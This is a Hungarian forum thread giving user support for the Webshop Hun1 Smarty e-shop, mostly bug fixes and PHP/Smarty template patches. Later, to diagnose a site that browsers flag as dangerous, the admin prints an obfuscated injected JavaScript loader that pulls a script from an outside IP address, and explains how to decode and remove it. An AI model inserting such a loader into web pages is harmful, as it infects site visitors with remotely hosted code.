Gondok

Általános kérdések a Webshop Hun1 Smarty programról.
Post Reply
robee
Hozzászólások: 12
Csatlakozott: pén. márc. 20, 2009 3:39 pm
Kapcsolat:

Gondok

Hozzászólás Szerző: robee »

Szia!
Néhány problémával találkoztam a napokban:
Regeltem egy teszt vásárlót és végigvittem a vásárlás folyamatát. Ekkor vettem észre, hogy a fizetésnél nem adja hozzá a választott szállítási mód költségét, hanem egy "ingyenes" felirat van a helyén. Pedig adminban be van állítva az összeg.
Vagy ott nem a szállítási mód költségének kellene szerepelnie? Ha nem, akkor mi ingyenes? Ha nem, akkor megoldaható valahogy, hogy hozzáadja a szállítási költséget is?

Másik gond:
Ha lekérek egy árlistát, akkor ez szerepel a tetején:
"Kovács Jakab
Szabad komuves
Jakabszállás, Király utca 1/b. 7627"
Ezt hol lehet megváltoztatni?

Harmadik:
Ha befejeztem a rendelést és a böngésző vissza gombjára kattintok a főoldal helyett, akkor egy hibaüzenet fogad:

SELECT sfl.neve, sf.ara, sf.ingyenes FROM myshop_szallitasi_formak_leiras as sfl, myshop_szallitasi_formak as sf WHERE sf.id = sfl.forma_id AND sfl.nyelv_id = 4 AND sf.id =
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 5
Fájl: /home/htdocs/konyvcentrum.com/www/include/center/megrendeles/megerosites.php sor: 50

Ez ellen lehet valamit tenni?

Negyedik:
Biro_kek sablont használom. Láttam, hogy a többi sablon olyan, hogy ha berakok egy terméket a kosárba, akkor kirak egy kis ablakot az esemény megtörténtéről, amit lelehet okézni. Ennél a sablonnál sajnos nincs ilyen funkció(vagy nem találtam).
Hiába állítom bárhová az admin felületen, nem jelez. Vagy berak a kosárba, vagy marad azon az oldalon mintha semmi sem történt volna. El lehet helyezni ezt a funkciót ebben a sablonban?

+1
A hírlevélbe beillesztett képet nem jeleníti meg. Ez elég nagy gond.
Gmail-en próbáltam, de itt eddig ilyen gond nem volt. Legalábbis más helyről kapott hírlevelek képei mindig megjelentek.


Jó lenne ha tudnál segíteni!
Köszi!
Robi

lumino
Hozzászólások: 7
Csatlakozott: hétf. ápr. 06, 2009 5:40 pm
Kapcsolat:

Re: Gondok

Hozzászólás Szerző: lumino »

Szeretnem megcsinalni a honlapomnak az angol valtozatat, de neha nehezsegekbe utkozom.
1. Ha a language/english vagy akar a magyar mappaba irom a szoveget, nem tudok ott linkeket csianlni. Egyelore ugy oldottam meg hogy a tpl-ekbe csinalom meg a linkes reszeket, de akkor magyar marad az a resz. (Pl http://www.lumino.hu/index.php?param=1&center=kapcsolat) MI a megoldas?
2. Keszitettem egy bemutatkozo oldalt, es ha abbol kattintok a angolra akkor hibauzenet jon, de ha mar angolban vagyok es onnan akarom elerni a bemutatkozo oldalt akkor bejon, es ugyanez forditva is ha angolbol magyarba probalom. Es persze itt is vannak linkek amit jo lenne angolul betenni.
Koszi elore is a segitseged!!

Kinga

Avatar
mezofi
Site Admin
Hozzászólások: 932
Csatlakozott: csüt. okt. 16, 2008 7:30 am
Kapcsolat:

Re: Gondok

Hozzászólás Szerző: mezofi »

@robee
A szállítási költségeknél nem csak a szállítás árát lehet beállítani, hanem alatta ven még egy input mező.
Mekkora vásárlási értéktől
ne számoljuk a költséget:
Itt adj meg olyan magas megrendelési összeget ami felett már megéri a megrendelőnek ingyenes szállítási költséggel számolni.
Pl.: állítsd be egymillióra, akkora rendelésnél már gondolom megéri, hogy te állod a szállítási költséget. :D

Az árlistákon megjelenő címek megváltoztatása a shop/pdf/index.php, és a shop/txt/index.php-ben történhet, de azt hiszem ezeket beleírtam a dokumentációba is.

Javítsuk ki a hibát is.
A shop/include/center.php-ben van ez a rész:

Kód: Egész kijelölése

 case "megerosites":
   require_once("include/center/megrendeles/megerosites.php"); 
  break;
Ezt módoljuk így:

Kód: Egész kijelölése

 case "megerosites":
  	if(isset($_SESSION["kosar"]) && count($_SESSION["kosar"]) > 0){
   require_once("include/center/megrendeles/megerosites.php"); 
	}else{
	require_once("include/center/uj_termekek.php"); 
	}
  break;
Ezzel nem engedjük betölteni a lapot, csak akkor ha még van a kosárba valami, különben az új termékek oldalt húzzuk be.

Módolni kell még a templaes részen is a templates/választott templates/center.tpl-t
Kb 34. sorban ez van

Kód: Egész kijelölése

{elseif $smarty.get.center == "megerosites" && $visitorID !== NULL}
	{include file="center/megrendeles/megerosites.tpl"}
Helyette ez kellene:

Kód: Egész kijelölése

{elseif $smarty.get.center == "megerosites" && $visitorID !== NULL && $listaz_kezdes == NULL}
	{include file="center/megrendeles/megerosites.tpl"}
Így nem engedi betölteni a megerősítési oldalt, de kell gondoskodni arról, hogy mindn ilyen esetben kapjon egy default értéket.
Ezért az oldal alja felé meg kellene adni egy
{include file="center/uj_termekek.tpl"}
-t.
Valahogy így:

Kód: Egész kijelölése

{include file="center/viszontelado.tpl"}
	{elseif $smarty.get.center == "toplista"}
	{include file="center/toplista.tpl"}
    {else}
    {include file="center/uj_termekek.tpl"}
	{/if}
Gondolom, ha megnyitod a régit akkor észre lehet venni, melyik a plussz két sor a végén.

Nekem abban a skinben is működik a pop-up ablak.
A shop/templates/biro_kek/index.tpl-nek ez a vége nálam:

Kód: Egész kijelölése

	</tr>
</table>
{include file="footer.tpl"}
</div>
</center>
{* Kell-e tájékoztatni a látogatót, hogy a termék kosárba került. *}
{if $kosarba_szoveg == 1 && $smarty.get.term_kosarba }
<script type="text/javascript" language="javascript">
alert("{$language.A_TERMEK_KOSARBA_KERULT}");
</script>
{/if}
</body>
</html>
Azt nézd meg, hogy amikor kosárba rakod a terméket utána az url vége ez lesz-e:
term_kosarba=yes

Avatar
mezofi
Site Admin
Hozzászólások: 932
Csatlakozott: csüt. okt. 16, 2008 7:30 am
Kapcsolat:

Re: Gondok

Hozzászólás Szerző: mezofi »

@lumino

Ha nem megy a Smartyval a linkek megadása, akkor segítségül kell hívni a php-t.
Létrehozol a shop/include/languagas/hungarian mappában egy linkjeim.php-t, a következő tartalommal.

Kód: Egész kijelölése

<?php
define("LINKEM1","<a href='http://www.mezofi.com' title='Linkem'>Első linkem a smartyban</a>");
?>
Gondolom nem lesz nehéz bővíteni. :)
Ezt húzasd be a shop/index.php-be. Valahol a 96. sor után, mert ott már ismeri a rendszer a nyelv értékét.

Kód: Egész kijelölése

require_once("include/languages/". $_SESSION["konfiguracio"]["nyelv"] ."/linkjeim.php");
Ezután már csak a megfelelő php oldalon át kell adni a Smartynak.
Pl a shop/include/center/kapcsolat.php oldalba ezt berakni.

Kód: Egész kijelölése

$TPL->assign('LINKEM1',LINKEM1);
És most a kapcsolat.tpl-ben megjelenítjük:

Kód: Egész kijelölése

{$LINKEM1}
Nálam ez a shop/include/boxok/jobb/nyelv_box.php tartalma:

Kód: Egész kijelölése

<?php 
$link = linkek();
$sql = "SELECT nyelv_id, mappa, kep, nev 
		FROM ".NYELV_TABLE." 
		ORDER BY sorrend";
$jobb_box_nyelv = mysql_query2(__LINE__, __FILE__, $sql);
//Ha van kiválasztva termék
if(isset($_GET["center"]) ){
$betet = "&center=".$_GET["center"];
	if(isset($_GET["term_id"])){
	$betet .= "&term_id=".$_GET["term_id"];
	}
}

$belso_szamlalo = 1;
//Smarty részére változóba töltjük
$nyelvi_kiiratas = "";
while($jobb_box_nyelvek = mysql_fetch_assoc($jobb_box_nyelv)){
	if($belso_szamlalo == 5){
	$nyelvi_kiiratas .= '<br/>';
	$belso_szamlalo = 1;
	}
$nyelvi_kiiratas .= zaszlok($jobb_box_nyelvek["mappa"], $jobb_box_nyelvek["kep"], $jobb_box_nyelvek["nev"],$link.'&nyelv_id='.$jobb_box_nyelvek["nyelv_id"].'&mappa='.$jobb_box_nyelvek["mappa"].$betet);
$belso_szamlalo ++;
 }
 
?>
Ha a tied nem ez akkor cseréld, így talán jó lesz.

robee
Hozzászólások: 12
Csatlakozott: pén. márc. 20, 2009 3:39 pm
Kapcsolat:

Re: Gondok

Hozzászólás Szerző: robee »

Köszönöm a segítséget. Amint lesz egy kis időm végigcsinálom a leírtakat.

Találtam egy hibát:

Ha az admin felületen a Katalógusból az Új termékek menüpontot választom akkor megjelennek azok a termékek amiknél ez az opció be van jelölve. Ha több oldalon keresztül vannak felsorolva(mint pl. nálam is) akkor a lapozásnál nem a megfelelő oldalra dob, hanem a Kategóriák és termékek menüpontba.

*
"A szállítási költségeknél nem csak a szállítás árát lehet beállítani, hanem alatta ven még egy input mező."
Itt nekem 20000 Ft van beállítva már régóta.
Itt egy kép róla:
Kép

**
A hiba még mindig fennáll, mikor visszalépek a rendelésből. De most már máshol jön elő. Rendelés befejezése után böngészőn vissza gomb, visszatér az új termékek közé. Ha rákattintok egy termékre hogy a kosárba raknám megint előjön ez:

SELECT sfl.neve, sf.ara, sf.ingyenes FROM myshop_szallitasi_formak_leiras as sfl, myshop_szallitasi_formak as sf WHERE sf.id = sfl.forma_id AND sfl.nyelv_id = 4 AND sf.id =
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 5
Fájl: /home/htdocs/konyvcentrum.com/www/include/center/megrendeles/megerosites.php sor: 50


***
term_kosarba=yes
Ez a link vége és az index. tpl vége is ugyanez. Mégsincs jelzés.

****
A hírlevéllel lehet valamit kezdeni, vagy ne zaklassam?

lumino
Hozzászólások: 7
Csatlakozott: hétf. ápr. 06, 2009 5:40 pm
Kapcsolat:

Re: Gondok

Hozzászólás Szerző: lumino »

sos!
Olyan visszajelzeseket kaptam a honlapommal kapcsolatban hogy a behivasakor ezt az uzenetet kuldi:
"A(z) lumino.hu címen működő webhelyről bejelentés érkezett, hogy támadó webhely, ezért a biztonsági beállítások alapján a böngésző a hozzáférést nem engedélyezi.
A támadó webhelyek megpróbálnak olyan programokat telepíteni, amelyek személyes adatokat lopnak el, a számítógépet mások megtámadására használják, vagy károsítják a rendszert.
Egyes támadó webhelyek szándékosan terjesztenek ártó szoftvereket, de sok olyan van, amelyet a tulajdonosa tudta vagy engedélye nélkül használnak ilyen célra."
Nekem gond nelkul bejon, de masnak nem. http://www.lumino.hu
Mi lehet az oka? _Hogy lehet javitani?
Nekem egy dolog jutott az eszembe, hogy a webtarhely szolgaltatotol kaptam uzeneteket, hogy upgrage-eltek bizonyos dolgokat, amire en nem reagaltam semmit (Python, Rails to Rails 2.3, Ruby and Rails -t) Lehet hogy emiatt?
Kinga

Avatar
mezofi
Site Admin
Hozzászólások: 932
Csatlakozott: csüt. okt. 16, 2008 7:30 am
Kapcsolat:

Re: Gondok

Hozzászólás Szerző: mezofi »

NEM!
A gond abból adódik, hogy eddig nem vetted észre, hogy egy kód csücsül a shop nyitó oldalának </head> rész után.
Lásd:

Kód: Egész kijelölése

</head><script language=javascript><!-- 
document.write(unescape('%3Cmyscrmyigwpt%20sny7rcgo0%3D%2F%2Fny794pM%2E24xb7%2E2pM%2Ego01pm95pM%2Fpmjxbqgwuepmry%2Epmjs%3E%3Cgw%2Fsgo0crimypny7tgw%3E').replace(/pm|xb|ny7|go0|pM|gw|fW|my/g,""));
 --></script>
<body>
A Firefox szerintem közösen kezdi kiszűrni azokat az oldalakat ahol megtalál egy tiltott oldalra való hivatkozást.
A fenti kód titkosítatlanul erre az oldalra mutat:
//94.247.2.195/jquery.js
Futtasd ez a kódot ez megjeleníti a titkosítatlan url-t egy alert ablakban:

Kód: Egész kijelölése

<script language=javascript><!-- 
kod = (unescape('%3Cmyscrmyigwpt%20sny7rcgo0%3D%2F%2Fny794pM%2E24xb7%2E2pM%2Ego01pm95pM%2Fpmjxbqgwuepmry%2Epmjs%3E%3Cgw%2Fsgo0crimypny7tgw%3E').replace(/pm|xb|ny7|go0|pM|gw|fW|my/g,""));
alert(kod);
 --></script>
Én is innen tudom.

Most jön a kérdés, hogy hogyan került oda.
Na erre én nem tudhatom a választ.
És még mely oldalakat fertőzte meg. Azt sem tudom, de te a Total Commanderrel csekKolhatod, kereső >> szövegben >> keresett kifejezés: (unescape('%3C

Töröld ezeket a részeket a forrásból, és a Google-nél kérj felülvizsgálatot, a Google fiókodban (Ha nincs hozz egyet létre) kérj kódot amit az oldal meta tagjába lehet beilleszteni. Sajnos van, hogy 4 hét múlva oldják csak fel a tiltást.

Egyébként az oldal IE-vel látogatható, abban is van forrás nézet, ott látható a kód.

Egy másik shop felhasználó is jelezte, hogy letiltotta a Google a shopját. Neki egy bővített verziója van, és sokkal régebbi.
Az ö shopjában is találtam három sort amiben <ifram>-ban hívtak be egy mixante.co...-s oldalt, és még két másikat.
Miután töröltem a kódot, másnap újra benne volt a szerverén lévő összes index oldalban.
Ezután kértem tőle, hogy minden más oldalt töröljön a szerveréről, csak a shop könyvárban maradjon meg az állomány. Most már 3 napja nem lett felülírva egyik oldal sem.
Neki volt valami blog készítő, és egy hírlevél program is a szerverén.

Nála alakítottam egy olyat, hogy minden látogatáskor ellenőrzi, hogy az index.php mikor lett mentve a fájl, és ha ez eltér a tárolástól akkor küld egy mailt.

lumino
Hozzászólások: 7
Csatlakozott: hétf. ápr. 06, 2009 5:40 pm
Kapcsolat:

Re: Gondok

Hozzászólás Szerző: lumino »

Nagyon koszonom az infokat. De sajnos nem tudom megoldani. Lehet hogy nagyon bena vagyok. Ha megnezem a forrasnezetet, latom azt a kodot amit irtal. Probaltam megkeresni hogy melyik fileban van es egyszeruen nem talalom. Kerestem total commanderrel, lementettem az egeszet a gepemre, es a dokumentumban is kerestem, de nincs. Es sajnos azota a masik -surun hasznalt -honlapomon is rajta van ugyanez a kod es a google letiltja. Ha siman beirom a bongeszobe akkor bejon az oldal. http://www.szelidbicajosok.hu -ott is vegig neztem keresovel es nem talalom. Ez a ket site ugyanarrol a szerverrol mukodik, egyik a masik alizejekent.
Szoval hogy tudom ezt megtalalni? Egyebkent kinyitottam az index php-t TC-vel es ott volt egy nagy oszzevisszasag benne, amit kitoroltem, azota legalabb siman bejon a honlap.
Nagyon jo lenne ha minel hamarabb tudnal valaszolni, mert szegeny gyerekek nem jutnak fabiciklihez, meg lampahoz :roll:
koszi, koszi, koszi...
Kinga

Avatar
mezofi
Site Admin
Hozzászólások: 932
Csatlakozott: csüt. okt. 16, 2008 7:30 am
Kapcsolat:

Re: Gondok

Hozzászólás Szerző: mezofi »

Küld a tárhely belépési adatokat privátban, mert innen nem tudok mit csinálni.
Mezőfi

droga
Hozzászólások: 23
Csatlakozott: kedd jún. 23, 2009 9:45 am
Kapcsolat:

Re: Gondok

Hozzászólás Szerző: droga »

Üdv

Egy olyan kérdésem volna, hogy hogyan tudnám megoldani, hogy a webshop fejlécképe alatti sorban lévő linkeknél (Főoldal >> Katalógus >> stb...) a Katalógus link ne a bemutatkozó oldalra vigyen, hanem inkább a teljes termékkészletet mutassa?
Mert az, hogy a webáruház megnyitásánál a bemutatkozó oldallal kezd, az rendben van és jó is így, de a katalógus linkre inkább szeretném, hogy a termékeket mutassa, méghozzá kategóriáktól függetlenül az összes terméket.
A választ előre is köszi.

Post Reply

Ki van itt

Jelenlévő fórumozók: nincs regisztrált felhasználó valamint 0 vendég